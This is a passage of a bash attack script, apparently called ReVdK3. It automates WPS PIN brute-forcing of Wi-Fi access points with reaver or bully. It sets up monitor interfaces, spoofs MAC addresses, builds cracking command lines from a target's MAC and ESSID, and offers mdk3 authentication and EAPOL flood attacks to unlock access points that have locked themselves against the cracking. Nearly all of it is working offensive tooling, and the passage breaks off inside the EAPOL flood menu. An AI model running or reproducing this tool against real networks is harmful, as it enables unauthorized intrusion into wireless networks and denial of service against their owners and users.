iw phy $PHY_OF_WLAN_1 interface add mon1 type monitor;
iw phy $PHY_OF_WLAN_1 interface add mon2 type monitor;
iw phy $PHY_OF_WLAN_1 interface add mon3 type monitor;

MON1=`iw dev | grep mon1 | cut -d " " -f 2`
MON2=`iw dev | grep mon2 | cut -d " " -f 2`
MON3=`iw dev | grep mon3 | cut -d " " -f 2`

iw dev

echo "Check the interfaces..."


echo "Successful!"

echo "################################################"

trap 'echo -e "\n\e[36m\e[1mCleaning up all temporary files created by this script..good house keeping...ensuring all processes are killed!\e[31m\e[0m"; 
killall -1 ReVdK3-r2.sh;killall mdk3 2> /dev/null; killall -9 reaver 2> /dev/null;killall -9 bully 2> /dev/null; killall tail 2> /dev/null; rm -f /etc/reaver_tmp.txt 2> /dev/null;
rm -f /etc/bully_tmp.txt 2> /dev/null; airmon-ng stop "$MON1" > /dev/null; airmon-ng stop "$MON2" > /dev/null; airmon-ng stop "$MON3" > /dev/null; 
killall aireplay-ng 2> /dev/null;rm -f /etc/aireplay_tmp.txt 2> /dev/null;killall -9 ReVdK3-r2.sh > /dev/null;' SIGINT SIGHUP EXIT
clear
function REAVER_COMMAND_LINE_OPTIONS {
while [ "$SATISFIED_OPTION" = r  ]; do
clear
echo ;
echo -e "\e[36m\e[40m\e[1m***********************************\e[0m";
echo -e "\e[36m\e[40m\e[1m*Welcome to Reaver's configuration*\e[0m";
echo -e "\e[36m\e[40m\e[1m***********************************\e[0m";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx        MAC ADDRESS OF AP              x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What is the mac address of the access point you are targeting?": MAC;
while [ -z "$MAC" ]; do
echo -e "\e[31m\e[1mYou need to input the target's MAC address\e[0m";
echo ;
read -p "What is the mac address of the access point you are targeting?": MAC;
done
echo "MAC address saved...";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx        ESSID OF AP                    x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What is the essid of the access point you are targeting": ESSID;
while [ -z "$ESSID" ]; do
echo -e "\e[31m\e[1mYou need to input the target's ESSID when running aireplay-ng &/or running mdk3 eapol start flood attacks!\e[0m";
echo ;
read -p "What is the essid of the access point you are targeting": ESSID;
done
echo "ESSID saved...";
echo;
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                              Reaver's Options                              x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                                                                            x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[1] Channel Option (-c)                                                     x\e[0m";
echo -e "\e[36m\e[40m\e[1mx(note: Some Access Points hop to another channel when they reboot!)         x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[2] Timeout Option (-t)                                                     x\e[0m";
echo -e "\e[36m\e[40m\e[1mx(Reaver's time to wait for a message from the AP)                           x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[3] Reaver's time between pin (-d)                                          x\e[0m"; 
echo -e "\e[36m\e[40m\e[1mx                                                                            x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
#CHANNEL CHAIN
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx           CHANNEL SWITCH              x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What channel do you want reaver to listen on (-c flag), or press ENTER to use reaver's default": CHANNEL;
while [[ "$CHANNEL" != @(1|2|3|4|5|6|7|8|9|10|11|12|13|14|15|16|)  ]]; do
echo -e "\e[31m\e[1mYou need to input a channel number between 1-16\e[0m";
echo ;
read -p "What channel do you want reaver to listen on (-c flag), or press ENTER to use reaver's default": CHANNEL;
done
#DISTANCE BETWEEN PIN ATTEMPTS CHAIN
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx           PIN DELAY SWITCH            x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p  "How much time in seconds for distance between pin attempts? (-d flag), if you want to use default option press ENTER ": DISTANCE_BETWEEN_PINS
while [[  $DISTANCE_BETWEEN_PINS = ["-"A-Za-qs-z'`''~''@''#''$''%''^''&''*''('')''_''+''=''|''['']''{''}''\'"'"'"'';'':'',''.''<''>''/''?'' *''0']*  ]]; do 
echo -e "\e[31m\e[1mYou need to choose a positive number!\e[0m";
echo ;
read -p  "How much time in seconds for distance between pin attempts? (-d flag), if you want to use default option press ENTER ": DISTANCE_BETWEEN_PINS
done
#TIME OUT CHAIN
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx           TIMEOUT SWITCH              x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "How much time in seconds for reaver to timeout if the AP doesn't respond? (-t flag), if you want to use default option press ENTER": TIMEOUT;
while [[  $TIMEOUT = ["-"A-Za-qs-z'`''~''@''#''$''%''^''&''*''('')''_''+''=''|''['']''{''}''\'"'"'"'';'':'',''.''<''>''/''?'' *''0']*  ]]; do 
echo -e "\e[31m\e[1mYou need to choose a positive number!\e[0m";
echo ;
read -p "How much time in seconds for reaver to timeout if the AP doesn't respond? (-t flag), if you want to use default option press ENTER": TIMEOUT;
echo ;
done
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx    REAVER COMMAND LINE YOU HAVE CHOSEN      x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
if [ -z "$CHANNEL" -a -n "$DISTANCE_BETWEEN_PINS" -a "$TIMEOUT" ]; then 
echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" -a -n "$TIMEOUT" ]; then
echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -t $TIMEOUT -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -t $TIMEOUT -l 10 -N -vv"`;
echo;
fi
if [ -z "$TIMEOUT" -a -n "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv"`;
echo ;
fi
if [ -z "$CHANNEL" -a -z "$DISTANCE_BETWEEN_PINS" -a -n "$TIMEOUT" ]; then
echo "reaver -i $MON1 -b $MAC -S -t $TIMEOUT -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -t "$TIMEOUT" -l 10 -N -vv"`;
echo ;
fi
if [ -z "$CHANNEL" -a -z "$TIMEOUT" -a -n "$DISTANCE_BETWEEN_PINS" ]; then
echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -l 10  -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -z "$TIMEOUT" -a -n "$CHANNEL" ]; then
echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -l 10 -N -vv"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -z "$TIMEOUT" -a -z "$CHANNEL" ]; then
echo "reaver -i $MON1 -b $MAC -S -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -l 10 -N -vv"`;
fi
if [ -n "$DISTANCE_BETWEEN_PINS" -a -n "$TIMEOUT" -a -n "$CHANNEL" ]; then
echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv"`;
echo ;
fi
echo ;
read -p "Are you satisfied with this configuration? If not, input 'r' and you will be returned to Reaver's Configuration Wizard": SATISFIED_OPTION;
if [ -e /etc/reaver_tmp.txt ]; then
rm -f /etc/reaver_tmp.txt
fi
if [ -e /etc/aireplay_tmp.txt ]; then
rm -f /etc/aireplay_tmp.txt
fi
clear
done
}

function BULLY_COMMAND_LINE_OPTIONS {
while [ "$SATISFIED_OPTION" = r  ]; do
clear
echo ;
echo -e "\e[36m\e[40m\e[1m***********************************\e[0m";
echo -e "\e[36m\e[40m\e[1m*Welcome to Bully's configuration *\e[0m";
echo -e "\e[36m\e[40m\e[1m***********************************\e[0m";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx          MAC ADDRESS OF AP            x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What is the mac address of the access point you are targeting?": MAC;
while [ -z "$MAC" ]; do
echo -e "\e[31m\e[1mYou need to input the target's MAC address\e[0m";
echo ;
read -p "What is the mac address of the access point you are targeting?": MAC;
done
echo "MAC address saved...";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx            ESSID OF AP                x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What is the essid of the access point you are targeting": ESSID;
while [ -z "$ESSID" ]; do
echo -e "\e[31m\e[1mYou need to input the target's ESSID when running aireplay-ng &/or running mdk3 eapol start flood attacks!\e[0m";
echo ;
read -p "What is the essid of the access point you are targeting": ESSID;
done
echo "ESSID saved...";
echo -e "\e[36m\e[1mResetting your mac address to its original mac\e[0m";
sleep 2;
ifconfig $WLAN down;
ifconfig $WLAN down;
ifconfig $WLAN down;
ifconfig $MON1 down;
ifconfig $MON1 down;
ifconfig $MON2 down;
ifconfig $MON2 down;
ifconfig $MON3 down;
ifconfig $MON3 down;
macchanger -p "$WLAN"> /dev/null;
macchanger -p "$MON1"> /dev/null;
macchanger -p "$MON2"> /dev/null;
macchanger -p "$MON3"> /dev/null;
ifconfig $MON1 up;
ifconfig $MON1 up;
ifconfig $MON2 up;
ifconfig $MON2 up;
ifconfig $MON3 up;
ifconfig $MON3 up;
echo;
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                              Bully's Options                               x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                                                                            x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[1] Channel Option (-c)                                                     x\e[0m";
echo -e "\e[36m\e[40m\e[1mx(note: Some Access Points hop to another channel when they reboot!)         x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[2] Bully's time between pin (-1)                                           x\e[0m"; 
echo -e "\e[36m\e[40m\e[1mx                                                                            x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[3] Force Bruteforce Checksum Digit (-B -F)                                 x\e[0m";
echo -e "\e[36m\e[40m\e[1mx                                                                            x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
echo -e "\e[34m\e[7m\e[1mNote:\e[31m\e[0m\e[31m\e[1m
Timeout option (-t) is Deprecated / Ignored in bully.\e[30m\e[0m"
echo ;
#CHANNEL CHAIN
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx           CHANNEL SWITCH              x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What channel do you want bully to listen on (-c flag), or press ENTER to use bully's default": CHANNEL;
while [[ "$CHANNEL" != @(1|2|3|4|5|6|7|8|9|10|11|12|13|14|15|16|)  ]]; do
echo -e "\e[31m\e[1mYou need to input a channel number between 1-16\e[0m";
echo ;
read -p "What channel do you want bully to listen on (-c flag), or press ENTER to use bully's default": CHANNEL;
done
#DISTANCE BETWEEN PIN ATTEMPTS CHAIN
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx           FIRST HALF OF PIN DELAY SWITCH            x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p  "How much time in seconds for distance between pin attempts? (-1 flag), if you want to use default option press ENTER ": DISTANCE_BETWEEN_PINS
while [[  $DISTANCE_BETWEEN_PINS = ["-"A-Za-qs-z'`''~''@''#''$''%''^''&''*''('')''_''+''=''|''['']''{''}''\'"'"'"'';'':'',''.''<''>''/''?'' *''0']*  ]]; do 
echo -e "\e[31m\e[1mYou need to choose a positive number!\e[0m";
echo ;
read -p  "How much time in seconds for distance between pin attempts? (-1 flag), if you want to use default option press ENTER ": DISTANCE_BETWEEN_PINS
done
echo ;
#BRUTEFORCE CHECKSUM
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx      BRUTEFORCE CHECKSUM DIGIT SWITCH       x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "Would you prefer bully to bruteforce the checksum digit if the first half of the pin is found? Press ENTER for 'no' or input 'y' or 'Y' for 'yes'": BRUTEFORCE_CHECKSUM;
while [[  $BRUTEFORCE_CHECKSUM != @(y|Y|) ]]; do 
echo -e "\e[31m\e[1mYou need to input 'y' or 'Y' for 'yes', or press ENTER for 'no'!\e[0m";
echo ;
read -p "Would you prefer bully to bruteforce the checksum digit if the first half of the pin is found? Press ENTER for 'no' or input 'y' or 'Y' for 'yes'": BRUTEFORCE_CHECKSUM;
echo;
done
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx    BULLY COMMAND LINE YOU HAVE CHOSEN       x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
############### -B -F arguments false###############################
if [ -z $BRUTEFORCE_CHECKSUM ]; then
if [ -z "$CHANNEL" -a -n "$DISTANCE_BETWEEN_PINS"  ]; then 
echo "bully -b $MAC  -1 $DISTANCE_BETWEEN_PINS,1 -l 10  -S -v3 -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC  -1 "$DISTANCE_BETWEEN_PINS,1" -l 10  -S -v3 -F $MON1"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "bully -b $MAC -c $CHANNEL -l 10 -S -v3 -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -c $CHANNEL -l 10 -S -v3 -F $MON1"`;
echo;
fi
if [ -n "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "bully -b $MAC -c $CHANNEL -1 $DISTANCE_BETWEEN_PINS,1 -l 10 -S -v3 -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -c $CHANNEL  -1 "$DISTANCE_BETWEEN_PINS,1" -l 10 -S -v3 -F $MON1"`;
echo ;
fi
if [ -z "$CHANNEL" -a -z "$DISTANCE_BETWEEN_PINS" ]; then
echo "bully -b $MAC -l 10 -S -v3 -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -l 10 -S -v3 -F $MON1"`;
echo ;
fi
fi
############### -B -F arguments true###############################
if [[ "$BRUTEFORCE_CHECKSUM" = @(y|Y) ]]; then
if [ -z "$CHANNEL" -a -n "$DISTANCE_BETWEEN_PINS"  ]; then 
echo "bully -b $MAC  -1 $DISTANCE_BETWEEN_PINS,1 -l 10  -S -v3 -B -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC  -1 "$DISTANCE_BETWEEN_PINS,1" -l 10  -S -v3 -B -F $MON1"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "bully -b $MAC -c $CHANNEL -l 10 -S -v3 -B -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -c $CHANNEL -l 10 -S -v3 -B -F $MON1"`;
echo;
fi
if [ -n "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "bully -b $MAC -c $CHANNEL  -1 $DISTANCE_BETWEEN_PINS,1 -l 10 -S -v3 -B -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -c $CHANNEL  -1 "$DISTANCE_BETWEEN_PINS,1" -l 10 -S -v3 -B -F $MON1"`;
echo ;
fi
if [ -z "$CHANNEL" -a -z "$DISTANCE_BETWEEN_PINS" ]; then
echo "bully -b $MAC -l 10 -S -v3 -B -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -l 10 -S -v3 -B -F $MON1"`;
echo ;
fi
fi
echo -e "\e[34m\e[7m\e[1mWarning:\e[31m\e[0m\e[31m\e[1m
Your mac address is not spoofed when using bully for proper functionality of 
bully.\e[30m\e[0m"
echo ;
read -p "Are you satisfied with this configuration? If not, input 'r' and you will be returned to Bully's Configuration Wizard": SATISFIED_OPTION;
if [ -e /etc/bully_tmp.txt ]; then
rm -f /etc/bully_tmp.txt
fi
if [ -e /etc/aireplay_tmp.txt ]; then
rm -f /etc/aireplay_tmp.txt
fi
clear
done
}
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                     ReVdK3 preferred WPS Pin Crackers                      x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                                                                            x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[1] Reaver v1.4 (legendary)                                                 x\e[0m";
echo -e "\e[36m\e[40m\e[1mx    Choose this option if you prefer to crack with reaver v1.4              x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[2] Bully v1.0-22                                                           x\e[0m";
echo -e "\e[36m\e[40m\e[1mx    Choose this option if you prefer to crack with bully v1.0-22            x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "Choose a preferred WPS Pin Cracker from above": WPS_PIN_CRACKER_OPTION
while [[ $WPS_PIN_CRACKER_OPTION != @(1|2)  ]]; do
echo -e "\e[31m\e[1mIncorrect Option, input either '1' for reaver or '2' for bully\e[0m";
echo ;
read -p "Choose a preferred WPS Pin Cracker from above": WPS_PIN_CRACKER_OPTION
echo ;
done
if [ $WPS_PIN_CRACKER_OPTION = 1 ]; then
if [ ! -z "$REAVER_CHECK" ]; then 
clear;
REAVER_COMMAND_LINE_OPTIONS
else
echo -e "\e[31m\e[1mreaver is not installed. Exiting script...\e[30m\e[0m";
exit
fi
fi
if [ $WPS_PIN_CRACKER_OPTION = 2 ]; then
if [ ! -z "$BULLY_CHECK" ]; then
clear;
BULLY_COMMAND_LINE_OPTIONS
else
echo -e "\e[31m\e[1mbully is not installed. Exiting script...\e[30m\e[0m";
exit
fi
fi
function MDK3_MAIN_MENU {
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                  WELCOME TO MDK3 FLOOD ATTACK MAIN MENU                    x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx[1] Authentication DoS Flood Attack                                         x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx[2] EAPOL Start Flood Attack                                                x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx[3] EAPOL log off Flood Attack                                              x\e[0m"; 
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx NOTE: This script will stop reaver once it detects the AP is locked and    x\e[0m";
echo -e "\e[36m\e[40m\e[1mx then flood the Access Point for the time period you choose after flooding  x\e[0m";
echo -e "\e[36m\e[40m\e[1mx reaver resumes. This process goes on until reaver finds the correct pin!   x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "Which attack do you prefer to carry out (input the number)?": MDK3_MAIN_MENU_OPTION;
while [[ "$MDK3_MAIN_MENU_OPTION" != @(1|2|3) ]]; do
echo -e "\e[31m\e[1mIncorrect option chosen, please choose an option from the Main Menu!\e[0m"; 
echo ;
read -p "Which attack do you prefer to carry out (input the number)?": MDK3_MAIN_MENU_OPTION;
done;
if [  "$MDK3_MAIN_MENU_OPTION" = 1  ]; then
clear
AUTH_DOS_MAIN_MENU;
fi
if [  "$MDK3_MAIN_MENU_OPTION" = 2  ]; then
clear
EAPOL_START_FLOOD_ATTACK_MAIN_MENU;
fi
if [  "$MDK3_MAIN_MENU_OPTION" = 3  ]; then
clear
EAPOL_LOG_OFF_ATTACK_MAIN_MENU; 
fi
}
###########################################################################
function AUTH_DOS_MAIN_MENU {
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                  Authentication DoS Flood Attack                           x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxNOTE: This Attack will start flooding the AP with numerous fake clients     x\e[0m";
echo -e "\e[36m\e[40m\e[1mxuntil reaver detects that the AP is unlocked. The attack will restart when  x\e[0m";
echo -e "\e[36m\e[40m\e[1mxthe AP has locked itself again...the process goes on!                       x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxThe Authentication DoS Flood Command line below will be used     x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
AUTH_DOS_FLOOD_COMMAND=`echo -e "\e[36m\e[1mmdk3 $MON1 a -a $MAC -s 200 & mdk3 $MON2 a -a $MAC -s 200 & mdk3 "$MON3" a -a $MAC -s 200\e[0m"`;
echo "$AUTH_DOS_FLOOD_COMMAND";
echo ;
read -p "To start the attack press ENTER to proceed or input 'r' to return to mdk3 main menu": RETURN_OPTION_FOR_AUTH_DOS_FOR_AUTH_DOS 
if [  "$RETURN_OPTION_FOR_AUTH_DOS_FOR_AUTH_DOS" = r ]; then
clear
MDK3_MAIN_MENU
fi
echo -e "\e[36m\e[1mStarting MDK3 Auth Flood Attack...\e[0m"
sleep 3;
clear
if [ $WPS_PIN_CRACKER_OPTION = 1 ]; then 
REAVER & AIREPLAY & MDK3_FOR_REAVER & TAIL_FOR_REAVER;
fi 
if [ $WPS_PIN_CRACKER_OPTION = 2 ]; then 
BULLY & AIREPLAY & MDK3_FOR_BULLY & TAIL_FOR_BULLY;
fi 
}
###########################################################################
function EAPOL_START_FLOOD_ATTACK_MAIN_MENU {
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                  EAPOL Start Flood Attack                                  x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxNOTE: This Attack will start flooding the AP with numerous EAPOL start      x\e[0m";
echo -e "\e[36m\e[40m\e[1mxpackets until reaver detects that the AP is unlocked. The attack will       x\e[0m";
echo -e "\e[36m\e[40m\e[1mxrestart when the AP has locked itself again...the process goes on!          x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo;
